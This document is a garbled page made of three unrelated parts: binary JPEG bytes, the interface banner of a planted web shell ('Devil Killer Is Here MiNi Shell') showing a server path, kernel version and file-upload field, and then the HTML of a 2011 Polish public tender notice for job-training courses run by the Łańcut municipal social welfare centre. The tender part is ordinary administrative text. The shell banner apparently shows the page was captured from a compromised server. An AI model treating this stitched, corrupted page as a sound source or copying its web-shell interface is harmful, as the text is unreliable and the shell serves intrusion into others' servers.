JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110419/118227-N-2011.html

<p class="kh_header"><b>Łańcut: Organizację i przeprowadzenie szkoleń w ramach projektu Czas na aktywność w mieście Łańcut realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łańcucie - współfinansowany z Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 118227 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łańcucie , ul. Józefa Piłsudskiego 9, 37-100 Łańcut, woj. podkarpackie, tel. 0-17 2253325, faks 0-17 2256167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopslancut.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizację i przeprowadzenie szkoleń w ramach projektu Czas na aktywność w mieście Łańcut realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łańcucie - współfinansowany z Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Organizacja i przeprowadzenie szkoleń w ramach projekt Czas na
aktywność w mieście Łańcut realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łańcucie współfinansowany z Europejskiego Funduszu Społecznego.
Celem głównym projektu jest podniesienie statusu zawodowego, uzupełnienie i dostosowanie kwalifikacji i umiejętności zawodowych i społecznych u 20 klientów MOPS poprzez przygotowanie
ich do wejścia lub powrotu na rynek pracy.
Projekt skierowany jest do 20 osób zamieszkałych na terenie m. Łańcuta.
Przedmiot zamówienia obejmuje:
1.Trening kompetencji umiejętności społecznych
Miejsce szkolenia: Miasto Łańcut
Liczba uczestników: 20 osób
Ilość godzin: 2 cykle razem 240 godzin dydaktycznych. Zajęcia mają być prowadzone przez trenera 
dla 2 grup.
Instrument ten obejmuje m.in. komunikację interpersonalną i perswazję, zarządzanie sobą w czasie,
zarządzanie stresem, asertywność, trening rozwiązywania problemów w trudnych sytuacjach międzyludzkich, trening budżetowy, trening umiejętności społecznych - przygotowanie do podjęcia
pracy.
Termin realizacji:  maj-czerwiec 2011

2.Szkolenie: Kasjer - handlowiec: fakturowanie, gospodarka magazynowa z programem magazynowym, obsługa kas fiskalnych.
Miejsce szkolenia: Miasto Łańcut
Liczba uczestników: 6 osób
Ilość godzin: 132  godzin dydaktycznych
Program szkolenia obejmuje: podstawy obsługi komputera, obsługa programu do fakturowania i obsługa programu magazynowego, obsługa kas fiskalnych-rodzaje urządzeń fiskalnych, podmiotowy 
i przedmiotowy obowiązek stosowania kas fiskalnych użycie kas fiskalnych, raporty kas fiskalnych, 
przepsiy regulujące stosowanie kas fisklnych, ogólna budowa kasy fiskalnej, możliowść współpracy z 
innymi urządzeniami, wymina rolek papieru, wprowadzenie nie zaprogramowanego kodu kasjera, 
zagadnienia dotyczące sprzedaży, operacje anulowania sprzedaży przed wydrukowaniem paragonu, 
wpłaty I wypłaty gotówki z kasy, obsługa raportów kasowych prawne aspekty sprzedaży, fakturowanie i dokumentowanie sprzedaży, zasady identyfikacji  fałszywych znaków pieniężnych, 
techniki sprzedaży, profesjonalna obsługa klienta, aspekty higieniczno - sanitarne, wiedza 
o konsumencie, organizacja pracy w sklepie.
Celem szkolenia jest opanowanie przez uczestników czynności niezbędnych do wykonywania zawodu: sprzedawcy, kasjera, handlowca.
Termin realizacji: wrzesień - październik 2011

3.Szkolenie: opiekunka dziecięca
Miejsce szkolenia: Miasto Łańcut
Liczba uczestników: 3 osoby
Ilość godzin: 100  godzin dydaktycznych
Program szkolenia obejmuje: podstawy procesu rozwoju dziecka, psychologiczno - społeczne uwarunkowania rozwoju dziecka, pielęgnacja, odżywianie, specjalistyczny kurs pierwszej pomocy, praktyka zawodowa, warsztaty psychologiczne, psychologię rozwojową wieku dziecięcego, psychologiczne aspekty opieki nad dzieckiem upośledzonym, chorym nadpobudliwym i zahamowanym, psychologię wychowawczą, twórcze wychowywanie dziecka, gry i zabawy ruchowe, profilaktyke zdrowotna. 
Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: opiekunka dziecięca.
Termin realizacji: wrzesień - październik 2011


4.Szkolenie: kurs komputerowy II stopnia 
Miejsce szkolenia: Miasto Łańcut
Liczba uczestników: 3 osoby
Ilość godzin: 80  godzin dydaktycznych
Program szkolenia obejmuje m.in.: przetwarzanie tekstów Edytor tekstów MS WORD,  OPENOFFICE,  arkusz Kalkulacyjny MS Excel, podstawy CorelDraw

Celem szkolenia jest przygotowanie uczestników do obsługi komputera w stopniu zaawansowanym
Termin realizacji: wrzesień - październik 2011 r.

5.Szkolenie: Kurs pełna księgowość I stopnia oraz kadry i płace
Miejsce szkolenia: Miasto Łańcut
Liczba uczestników: 4 osoby
Ilość godzin: Kurs pełna księgowośc I stopnia 120 godz. ;  kadry i płace 64 godz.  Razem: 184 godz.
dydaktycznych
Uczestnik szkolenia winien zdobyć wiedzę z zakresu między innymi : 
1) księgowości: podstawy rachunkowości, ewidencja aktywów trwałych, aktywa pieniężne, rozrachunki i kapitały, księgowość materiałowa, towarowa, ewidencja wynagrodzeń i świadczeń na rzecz pracowników, ewidencja kosztów i produktów, wynik finansowy i zamknięcie ksiąg, wybrane zagadnienia prawa.
2) kadry i płace: podstawowe zasady prawa pracy, stosunek pracy i umowy cywilno prawne, obowiązki pracodawcy i pracownika, odpowiedzialność za wykroczenia przeciwko prawom pracownika, wynagrodzenia i jego ochrona, czas pracy, urlopy pracownicze i inne nieobecności, uprawnienia pracowników związane z rodzicielstwem, bezpieczeństwo i higiena pracy, wynagrodzenia, praktyczny aspekt prowadzenia kadr i płac.

Celem szkolenia jest przygotowanie uczestników do wykonywania zawodu: księgowy,  kadrowy.
Termin realizacji: wrzesień - październik 2011

6.Szkolenie: technolog robót wykończeniowych
Miejsce szkolenia: Miasto Łańcut
Liczba uczestników: 2 osoby
Ilość godzin: 152 godzin dydaktycznych
Program szkolenia obejmuje: Program szkolenia obejmuje: montaż elementów kartonowo-gipsowych,
montaż elementów z tworzyw sztucznych, wykonywanie gładzi gipsowej, izolacji budowlanych, 
malowanie, tapetowanie i prace dekoratorskie, wykonywanie okładzin ściennych oraz posadzek z 
płytek ceramicznych, wykładzin i paneli technolog robót wykończeniowych.
Termin realizacji: wrzesień - październik 2011

7.Szkolenie: magazynier - obsługa programów magazynowo - hurtowych oraz wózki jezdniowe
Miejsce szkolenia: Miasto Łańcut
Liczba uczestników: 2 osoby
Ilość godzin: 110 godzin dydaktycznych
Program szkolenia obejmuje: obsługa programów magazynowo - hurtowych, typy stosowanych wózków jezdniowych, budowa wózka, czynności kierowcy przy obsłudze wózków przed podjęciem 
pracy, w czasie pracy oraz po pracy z wózkami, bezpieczna wymiana butli w wózkach wyposażonych 
w te urządzenia, wiadomości o dozorze technicznym, wiadomości z zakresu ładunkoznawstwa, wiadomości z zakresu bhp, praktyczna nauka jazdy i manewrowania osprzętem wózków.
Celem szkolenia jest opanowanie przez uczestników czynności niezbędnych do wykonywania zawodu
magazyniera oraz operatora wózka jezdniowego.
Termin realizacji: wrzesień - październik

Zajęcia szkoleniowe mają odbywać się od poniedziałku do piątku. Maksymalna ilość godz dydaktycznych - 8godz. dziennie zapewniając przynajmniej jedną przerwę na posiłek.
Wykonawca ma przedłożyć harmonogram szkoleń, szczegółowy program szkoleń, określić formy, 
metody szkolenia/nauki, przewidzianą ilość godzin zajęć teoretycznych i praktycznych.
Wykonawca ponosi wszelkie koszty związane z realizacją zamówienia z uwzględnieniem 
obowiązujących w tym zakresie przepisów prawa.
Wykonawca zapewnia: sale szkoleniowe, sprzęt dydaktyczny, materiały szkoleniowe dla uczestników,
warunki w czasie szkoleń zgodne z przepisami BHP, wyżywienie: śniadanie (kanapki), ciastka, kawa,
herbata, ciepły posiłek (obiad składających się z 2 dań).
W sali szkoleniowej należy umieścić logo EFS oraz informację, że projekt jest współfinansowany ze 
środków EFS.
Wykonawca pokrywa koszty niezbędnych badań lekarskich uczestników danego szkolenia (wyrobienie książeczki zdrowia) jeżeli specyfika kursu tego wymaga, ubezpieczenia uczestników 
szkolenia od następstw nieszczęśliwych wypadków (podczas szkolenia, w drodze na szkolenie i ze 
szkolenia).
Wykonawca zapewni, że program szkoleń zawodowych, przeprowadzenie szkolenia musi odbyć się 
zgodnie z obowiązującymi przepisami prawa - ustawa z dnia 26 czerwca 1974 kodeks pracy (Dz. 
z 1998 r. Nr 21 poz. 94 ze zm.)
Szkolenie ma zakończyć się oceną zdobytych umiejętności oraz wydaniem stosownego dokumentu:
certyfikatu, dyplomu lub zaświadczenia o ukończeniu szkolenia zgodnie z obowiązującymi w tym 
zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie 
uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. z 2006 r. Nr 31 poz. 216). 
Wydane certyfikaty muszą zawierać logo Europejskiego Funduszu Społecznego oraz informację, że 
projekty były współfinansowane ze środków EFS.
Wykonawca ma dostarczyć Zamawiającemu pełną dokumentację szkoleń tj. m.in. kserokopie dziennika zajęć edukacyjnych zawierającego tematy zajęć i wymiar godzin oraz listę obecności 
z własnoręcznymi podpisami uczestników szkoleń, potwierdzenia odbioru materiałów szkoleniowych; kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie określonych kwalifikacji, kserokopie rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, kserokopię protokołu egzaminacyjnego w przypadku kursu kończącego się egzaminem, ankiety oceny szkolenia, informacje końcowe o przebiegu szkolenia wraz z oceną dokonaną na podstawie ankiet przed rozpoczęciem i po zakończeniu szkolenia.

8.Poradnictwo specjalistyczne w tym wsparcie specjalistyczne: kwestie uzależnień, zdrowego trybu życia, interwencji kryzysowych, mediacji rodzinnych, kwestie prawne, diagnozy opracowane odpowiednio przez: psychologa, prawnika, doradcę zawodowego, trenera
1)	Grupowe - 2 spotkania tematyczne w ilości 2 godz. dydaktycznych każde (razem 4 godz.), połączone z prezentacjami, które poprowadzą specjaliści z zakresu promocji zdrowia, zdrowego trybu życia, uzależnień, interwencji kryzysowych i mediacji rodzinnych: maj - czerwiec  2011
2)	Poradnictwo specjalistyczne indywidualne: 
a)	psychologiczne dla 20 osób w ilości 1 godz. (60 min.) na osobę = 20 godz. maj - listopad
2011
b)	prawne: porady indywidualne - 5 godz.: maj  - listopad 2011 r.
c)	ilość godz. 15 łącznie na pomoc w zakresie: interwencji kryzysowych, mediacji rodzinnych, 
  		 psychopedagogicznej pomocy rodzinie. Termin: maj-listopad 2011.
d)	terapia psychologiczna krótkoterminowa, rodzinna lub psychospołeczna dla rodzin lub osób (np. konsultacja rodzinna) - 72 godz., maj-listopad
e)	program korekcyjno-edukacyjny dla osób stosujących przemoc w rodzinie, zgodnie z ustawą 
o przeciwdziałaniu przemocy w rodzinie - 12 godz. maj-listopad 2011
f)	poradnictwo i wsparcie z zakresu np. profilaktyki kryzysów życiowych - 24 godz. dydaktyczne maj-listopad 2011
g)	wspomagania funkcji wychowawczej rodziny - 40 godz. dydaktycznych, maj-listopad 2011
3)	grupy wsparcia, samopomocowe: ilość 24 godz. (1 godz. = 60 min.) maj - listopad 2011



9.	Doradca zawodowy - doradztwo indywidualne dla 20 osób w ilości 42 godz. (1 godz. = 
60 min.)  tj. 2 godz. na osobę oraz dodatkowo 2 godz. do konsultacji - łacznie 42 godz.
Indywidualne konsultacje, w tym diagnoza możliwości zawodowych: rozpoznanie potencjału zawodowego, urealnienie samooceny i rozwinięcie wglądu we własne możliwości, rozpoznanie indywidualnych obszarów trudności, kwalifikacje zawodowe wymagane na konkretnych stanowiskach
pracy, utwierdzenie podjętej decyzji przez uczestnika projektu dotyczącej ścieżki szkoleń zawodowych oraz przyszłej pracy, indywidualny plan działania , analiza potrzeb klienta, samodzielne 
opracowanie przez uczestnika projektu aplikacji zawodowych - tematyka zostanie dostosowana do 
indywidualnych potrzeb uczestników, zależeć będzie od ich oczekiwań, poziomu wiedzy 
i umiejętności, doradztwo
Termin: maj  2011.

10.	Spotkania promocyjne: maj  i listopad 2011
Uczestnictwo przedstawiciela Wykonawcy w spotkaniach promocyjnych i przedstawienie programu
szkoleń - spotkanie pierwsze oraz podsumowanie i ocena odbytych szkoleń - spotkanie drugie.

Zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależenie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia...</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w okresie 3 lat od udzielenia zamówienia podstawowego przewiduje udzielenieWykonawcy wybranemu w przedmiotowym postępowaniu, zamówień uzupełniających w trybie zamówienia z wolnej ręki, które stanowić będą nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienia te będą dotyczyć przedmiotu zamówienia określonego w niniejszej SIWZ i polegać będą na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.53.00.00-8, 80.56.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu(posiadają aktualny wpis do rejestru instytucji szkoleniowych)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi szkolenia o wartości co najmniej 40.000 każda oraz załączą dokumenty potwierdzające, że te usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże, że dysponuje osobami posiadającymi kwalifikacje zawodowe oraz doświadczenie i wykształcenie niezbędne do wykonania przedmiotu zamówienia (psycholog, prawnik, trener, doradca zawodowy)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie tego warunku na podstawie treści oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz zakresu zamówienia, który będzie realizowany przez Podwykonawców (jeżeli wykonawca przewiduje zaangażowanie podwykonawców do wykonania zamówienia). Formularz Cenowy - kalkulacja - kosztorys ofertowy. Program szkolenia. Dokument - wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy Prawo zamówień publicznych zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treścioferty, na podstawie, której wybrano wykonawcę polegającej na zmianie terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy - z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia, zmiany kluczowego personelu Wykonawcy - za uprzednią zgodą zamawiającego wyrażoną na piśmie, jeżeli wynika z przyczyn niezależnych od Wykonawcy (np. zdarzenia losowe: choroba, wypadek itp.); wynagrodzenia w przypadku zmniejszenia ilości usług przez Zamawiającego bez zapłaty dodatkowych kwot oraz jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. Warunki dokonywania zmian postanowień umowy: 1) inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 2) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy, 3) forma pisemna pod rygorem nieważności w formie aneksu do umów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopslancut.pl, www.wrota.podkarpackie.pl/pl/bip/gminy/um_lancut<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Łańcucie, ul. Piłsudskiego 9, 37-100 Łańcut, pok. 6...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 15:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Łańcucie, ul. Piłsudskiego 9, 37-100 Łańcut, pok. 6...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




